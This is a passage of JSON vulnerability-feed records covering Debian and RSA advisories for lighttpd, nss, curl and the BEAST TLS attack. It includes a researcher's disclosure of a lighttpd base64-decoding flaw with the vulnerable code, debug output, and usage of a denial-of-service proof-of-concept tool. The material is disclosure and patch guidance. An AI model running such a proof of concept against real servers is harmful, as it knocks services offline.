{"risk factor": "Low", "score": "2.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2011-12-20T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": []}
{"osv": [{"lastseen": "2023-06-28T06:47:29", "description": "\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\n\n* [CVE-2011-4362](https://security-tracker.debian.org/tracker/CVE-2011-4362)\nXi Wang discovered that the base64 decoding routine which is used to\n decode user input during an HTTP authentication, suffers of a signedness\n issue when processing user input. As a result it is possible to force\n lighttpd to perform an out-of-bounds read which results in Denial of\n Service conditions.\n* [CVE-2011-3389](https://security-tracker.debian.org/tracker/CVE-2011-3389)\nWhen using CBC ciphers on an SSL enabled virtual host to communicate with\n certain client, a so called BEAST attack allows man-in-the-middle\n attackers to obtain plaintext HTTP traffic via a blockwise\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a workaround to\n mitigate this problem by providing a possibility to disable CBC ciphers.\n\n\nThis updates includes this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break older\n clients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19-5+lenny3.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\n\n\n", "cvss3": {}, "published": "2011-12-20T00:00:00", "type": "osv", "title": "lighttpd - several", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "modified": "2023-06-28T06:47:16", "id": "OSV:DSA-2368-1", "href": "https://osv.dev/vulnerability/DSA-2368-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-28T06:20:50", "description": "\nnss 3.12.8-1+squeeze11 fixes two security issues:\n\n\n* [CVE-2011-3389](https://security-tracker.debian.org/tracker/CVE-2011-3389)\nSSL 3.0 and TLS 1.0 connections were vulnerable to some chosen\n plaintext attacks which allowed man-in-the middle attackers to obtain\n plaintext HTTP headers on an HTTPS session. This issue is known as\n the BEAST attack.\n* [CVE-2014-1569](https://security-tracker.debian.org/tracker/CVE-2014-1569)\nPossible information leak with too-permissive ASN.1 DER decoding of\n length.\n\n\nFor Debian 6 Squeeze, these issues have been fixed in nss version 3.12.8-1+squeeze11\n\n\n", "cvss3": {}, "published": "2015-02-16T00:00:00", "type": "osv", "title": "nss - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3389", "CVE-2014-1569"], "modified": "2023-06-28T06:20:47", "id": "OSV:DLA-154-1", "href": "https://osv.dev/vulnerability/DLA-154-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-28T06:26:03", "description": "\nSeveral vulnerabilities have been discovered in cURL, an URL transfer\nlibrary. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\n\n* [CVE-2011-3389](https://security-tracker.debian.org/tracker/CVE-2011-3389)\nThis update enables OpenSSL workarounds against the BEAST attack.\n Additional information can be found in the [cURL advisory](http://curl.haxx.se/docs/adv_20120124B.html)\n* [CVE-2012-0036](https://security-tracker.debian.org/tracker/CVE-2012-0036)\nDan Fandrich discovered that cURL performs insufficient sanitising\n when extracting the file path part of an URL.\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 7.18.2-8lenny6.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 7.21.0-2.1+squeeze2.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 7.24.0-1.\n\n\nWe recommend that you upgrade your curl packages.\n\n\n", "cvss3": {}, "published": "2012-03-31T00:00:00", "type": "osv", "title": "curl - several", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3389", "CVE-2012-0036"], "modified": "2023-06-28T06:25:58", "id": "OSV:DSA-2398-1", "href": "https://osv.dev/vulnerability/DSA-2398-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:45", "description": "DoS on base64 parsing.", "cvss3": {}, "published": "2012-01-02T00:00:00", "type": "securityvulns", "title": "lighthttpd security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "modified": "2012-01-02T00:00:00", "id": "SECURITYVULNS:VULN:12116", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12116", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:43", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ---------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2368-1 security@debian.org\r\nhttp://www.debian.org/security/ Nico Golde\r\nDec 20th, 2011 http://www.debian.org/security/faq\r\n- ---------------------------------------------------------------------------\r\n\r\nPackage : lighttpd\r\nVulnerability : multiple\r\nProblem type : remote\r\nDebian-specific: no\r\nDebian bug : 652726\r\nCVE IDs : CVE-2011-4362 CVE-2011-3389\r\n\r\nSeveral vulnerabilities have been discovered in lighttpd, a small and fast\r\nwebserver with minimal memory footprint.\r\n\r\nCVE-2011-4362\r\n\r\n Xi Wang discovered that the base64 decoding routine which is used to\r\n decode user input during an HTTP authentication, suffers of a signedness\r\n issue when processing user input. As a result it is possible to force\r\n lighttpd to perform an out-of-bounds read which results in Denial of\r\n Service conditions.\r\n\r\nCVE-2011-3389\r\n\r\n When using CBC ciphers on an SSL enabled virtual host to communicate with\r\n certain client, a so called "BEAST" attack allows man-in-the-middle\r\n attackers to obtain plaintext HTTP traffic via a blockwise\r\n chosen-boundary attack (BCBA) on an HTTPS session. Technically this is\r\n no lighttpd vulnerability. However, lighttpd offers a workaround to\r\n mitigate this problem by providing a possibility to disable CBC ciphers.\r\n\r\n This updates includes this option by default. System administrators\r\n are advised to read the NEWS file of this update (as this may break older\r\n clients).\r\n\r\n\r\nFor the oldstable distribution (lenny), this problem has been fixed in\r\nversion 1.4.19+lenny3.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 1.4.28-2+squeeze1.\r\n\r\nFor the testing distribution (squeeze), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1.4.30-1.\r\n\r\n\r\nWe recommend that you upgrade your lighttpd packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk7xJ1MACgkQHYflSXNkfP+N5ACgtImneTJSdyEiCLnWTFA0uxzz\r\nqP0An07LJwL5K3NmrMRfKeCVpigpn1zR\r\n=QU3k\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2011-12-26T00:00:00", "type": "securityvulns", "title": "[SECURITY] [DSA 2368-1] lighttpd security update", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "modified": "2011-12-26T00:00:00", "id": "SECURITYVULNS:DOC:27485", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27485", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:43", "description": "29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n\r\n\r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before the base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this vulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n Usage: ./p_cve-2011-4362 <options>\r\n\r\n Options:\r\n -v <victim>\r\n -p <port>\r\n -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n [+] Preparing arguments... OK\r\n [+] Creating socket... OK\r\n [+] Connecting to [127.0.0.1]... OK\r\n [+] Sending dirty packet... OK\r\n\r\n [+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n.\r\n.\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in \u0417Yg\\u00a7\u041e\u044an\u0446Xt\u0455]rze\u043b\u042b\u0444\u0455gY\u0443\u043f\\u0440\u044fYb\u043eY(\u0457d\u042f\u0448r\u0426[Y\u0443\u044a\u0429-\u00b7xi\u044e\u0438i\u00b0k\u0412Wp\u041b\t]߶\u0448\u0442\\u0434\u0412\u0427@V\u0428\u0434\u00a6x\u0443\u044a\u042dize \r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttp://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\r\n", "cvss3": {}, "published": "2012-01-02T00:00:00", "type": "securityvulns", "title": "Lighttpd Proof of Concept code for CVE-2011-4362", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2012-01-02T00:00:00", "id": "SECURITYVULNS:DOC:27504", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27504", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\n\r\n\r\nESA-2012-032.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2012-032: RSA BSAFE\u00ae Micro Edition Suite Security Update for BEAST (Browser Exploit Against SSL/TLS) attacks\r\n\r\nEMC Identifier: ESA-2012-032\r\n \r\nCVE Identifier: CVE-2011-3389\r\n \r\nSeverity Rating: CVSS v2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)\r\n \r\nAffected Products:\r\nAll versions of RSA BSAFE Micro Edition Suite (MES) except 4.0.5 and 3.2.6, all platforms\r\n \r\nUnaffected Products:\r\nRSA BSAFE MES 4.0.5, 3.2.6\r\n \r\nSummary: \r\nRSA BSAFE Micro Edition Suite contains updates designed to help prevent BEAST attacks (CVE-2011-3389)\r\n \r\nDetails: \r\nThere is a known vulnerability in SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric key algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plain text encrypted with the same IV and key generates the same cipher text, which is why having a variable IV is important.\r\n \r\nThe BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time.\r\n \r\nRecommendation:\r\nThe best way to help prevent this attack is to use TLS v1.1 or higher. The vulnerability to do with IV generation was fixed in TLS v1.1 (released in 2006) so implementations using only TLS v1.1 or v1.2 are engineered to be secure against the BEAST exploit. However, support for these higher level protocols is limited to a smaller number of applications, so supporting only TLS v1.1 or v1.2 might cause interoperability issues.\r\n \r\nA second solution is to limit the negotiated cipher suites to exclude those that do not require symmetric key algorithms in CBC mode. However, this substantially restricts the number of cipher suites that can be negotiated. That is, only cipher suites with NULL encryption or cipher suites with streaming encryption algorithms (the RC4 algorithm) could be negotiated, which might result in reduced security.\r\n \r\nIn MES, the way to prevent the BEAST exploit is to introduce some unknown data into the encryption scheme, prior to the attackers inserted plain text data. This is done as follows:\r\n \r\n1. After the first encrypted record is sent, any plaintext to be encrypted is split into two blocks of plaintext. The blocks of data are then sent as two encrypted records; the first encrypted record contains the first byte of data and the second encrypted record contains the rest.\r\n2. A MAC is generated from the one byte of data, the MAC key, and an increasing counter. This MAC is included in the first block of plaintext.\r\n3. The one byte of data along with the MAC is encrypted and becomes the IV for the next block. Because the IV is now essentially random data, it is impossible for an attacker to predict it and replace it with one of their own.\r\n \r\nNOTE: In this release of MES, the mitigation for the BEAST exploit is enabled by default. No code changes are required to protect against it.\r\n \r\nIn special cases, if required, the BEAST exploit mitigation, either for an SSL context or SSL object can be disabled by calling R_SSL_CTX_set_options_by_type() or R_SSL_set_options_by_type() respectively, with the SSL_OP_TYPE_SECURITY option type and the SSL_OP_NO_BEAST_MITIGATION identifier.\r\n \r\nNote the following about first block splitting:\r\n\u00b7 Splitting only occurs for negotiated cipher suites that use CBC mode.\r\n\u00b7 Handshake packets are not split. Only application data packets are split.\r\n\u00b7 Blocks of plaintext are split for each subsequent call to write data to the SSL connection after the first write is sent.\r\n \r\nFor more information about these functions and identifiers, see the RSA BSAFE MES API Reference Guide.\r\n \r\nObtaining Downloads: \r\nTo request your upgrade of the software, please call your local support telephone number (contact phone numbers are available at http://www.emc.com/support/rsa/contact/phone-numbers.htm) for most expedient service. \r\n\r\nObtaining Documentation:\r\nTo obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.\r\n\r\nSeverity Rating:\r\nFor an explanation of Severity Ratings, refer to the Knowledge Base Article, \u201cSecurity Advisories Severity Rating\u201d at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\nObtaining More Information:\r\nFor more information about RSA products, visit the RSA web site at http://www.rsa.com.\r\n\r\nGetting Support and Service:\r\nFor customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.\r\n\r\nGeneral Customer Support Information:\r\nhttp://www.emc.com/support/rsa/index.htm\r\n\r\nRSA SecurCare Online:\r\nhttps://knowledge.rsasecurity.com\r\n\r\nEOPS Policy:\r\nRSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. \r\nhttp://www.emc.com/support/rsa/eops/index.htm\r\n\r\nSecurCare Online Security Advisories\r\nRSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nAbout RSA SecurCare Notes & Security Advisories Subscription\r\nRSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If you\u2019d like to stop receiving RSA SecurCare Notes & Security Advisories, or if you\u2019d like to change which RSA product family Notes & Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes & Security Advisories you no longer want to receive. Click the Submit button to save your selection.\r\n\r\nSincerely,\r\nRSA Customer Support\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlNIFjYACgkQtjd2rKp+ALwv3wCgx/mvkF8UsYt+YHuSuvFi+bS4\r\nehYAoMwjDiemy19XL7m8RH5Y52t2y5Fj\r\n=bLjw\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-05-05T00:00:00", "type": "securityvulns", "title": "ESA-2012-032: RSA BSAFE\u00ae Micro Edition Suite Security Update for BEAST (Browser Exploit Against SSL/TLS) attacks", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2014-05-05T00:00:00", "id": "SECURITYVULNS:DOC:30611", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30611", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:46", "description": "\r\n\r\n\r\n\r\nESA-2012-032.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nESA-2012-032: RSA BSAFE\u00ae Micro Edition Suite Security Update for BEAST (Browser Exploit Against SSL/TLS) attacks\r\n\r\nEMC Identifier: ESA-2012-032\r\n\r\nCVE Identifier: CVE-2011-3389\r\n\r\nSeverity Rating: CVSS v2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)\r\n\r\n\r\nAffected Products:\r\n\r\nAll versions of RSA BSAFE Micro Edition Suite prior to 4.0, all platforms\r\n\r\n\r\nUnaffected Products:\r\n\r\nRSA BSAFE Micro Edition Suite 4.0 and higher\r\n\r\n\r\nSummary:\r\n\r\nRSA BSAFE Micro Edition Suite contains updates designed to prevent BEAST attacks (CVE-2011-3389)\r\n\r\n\r\n\r\nDetails:\r\n\r\nThere is a known vulnerability in SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric key algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plain text encrypted with the same IV and key generates the same cipher text, which is why having a variable IV is important.\r\n\r\nThe BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time.\r\n\r\n\r\n\r\nRecommendation:\r\n\r\nThe best way to help prevent this attack is to use TLS v1.1 or higher. The vulnerability to do with IV generation was fixed in TLS v1.1 (released in 2006) so implementations using only TLS v1.1 or v1.2 are engineered to be secure against the BEAST exploit. However, support for these higher level protocols is limited to a smaller number of applications, so supporting only TLS v1.1 or v1.2 might cause interoperability issues.\r\n\r\nA second solution is to limit the negotiated cipher suites to exclude those that do not require symmetric key algorithms in CBC mode. However, this substantially restricts the number of cipher suites that can be negotiated. That is, only cipher suites with NULL encryption or cipher suites with streaming encryption algorithms (the RC4 algorithm) could be negotiated, which might result in reduced security.\r\n\r\nFor customers who cannot or should not implement either of these two methods, RSA BSAFE Micro Edition Suite 4.0 introduces a new feature called first block splitting. First block splitting prevents the BEAST exploit by introducing unknown data into the encryption scheme prior to the attackers inserted plain text data. This is done as follows: \r\n\r\n\u20221. The first plain text block to be encrypted is split into two blocks. The first block contains the first byte of the data, the second block contains the rest.\r\n\u20222. A MAC is generated from the one byte of data, the MAC key, and an increasing counter. This MAC is included in the first block.\r\n\u20223. The one byte of data, along with the MAC, is encrypted and becomes the IV for the next block. Because the IV is now essentially random data, it is impossible for an attacker to predict it and replace it with one of their own.\r\nTo implement first block splitting in RSA BSAFE Micro Edition Suite 4.0, either for an SSL context or SSL object, call R_SSL_CTX_set_options_by_type() or R_SSL_set_options_by_type() respectively, with the SSL_OP_TYPE_SECURITY option type and the SSL_OP_SPLIT_FIRST_FRAGMENT identifier.\r\n\r\nFor more information about these functions and identifiers, see the RSA BSAFE Micro Edition Suite API Reference Guide.\r\n\r\n\r\n\r\nSeverity Rating:\r\n\r\nFor an explanation of Severity Ratings, refer to the Knowledge Base Article, \u201cSecurity Advisories Severity Rating\u201d at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\n\r\nObtaining Documentation:\r\n\r\nTo obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.\r\n\r\n\r\n\r\nObtaining More Information:\r\n\r\nFor more information about RSA BSAFE, visit the RSA web site at http://www.rsa.com/node.aspx?id=1204.\r\n\r\n\r\n\r\nGetting Support and Service:\r\n\r\nFor customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.\r\n\r\n\r\nGeneral Customer Support Information:\r\n\r\nhttp://www.rsa.com/node.aspx?id=1264\r\n\r\n\r\nRSA SecurCare Online:\r\n\r\nhttps://knowledge.rsasecurity.com\r\n\r\n\r\nEOPS Policy:\r\n\r\nRSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. \r\nhttp://www.rsa.com/node.aspx?id=2575\r\n\r\n\r\nSecurCare Online Security Advisories\r\n\r\nRSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\n\r\nAbout RSA SecurCare Notes & Security Advisories Subscription\r\n\r\nRSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If you\u2019d like to stop receiving RSA SecurCare Notes & Security Advisories, or if you\u2019d like to change which RSA product family Notes & Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes & Security Advisories you no longer want to receive. Click the Submit button to save your 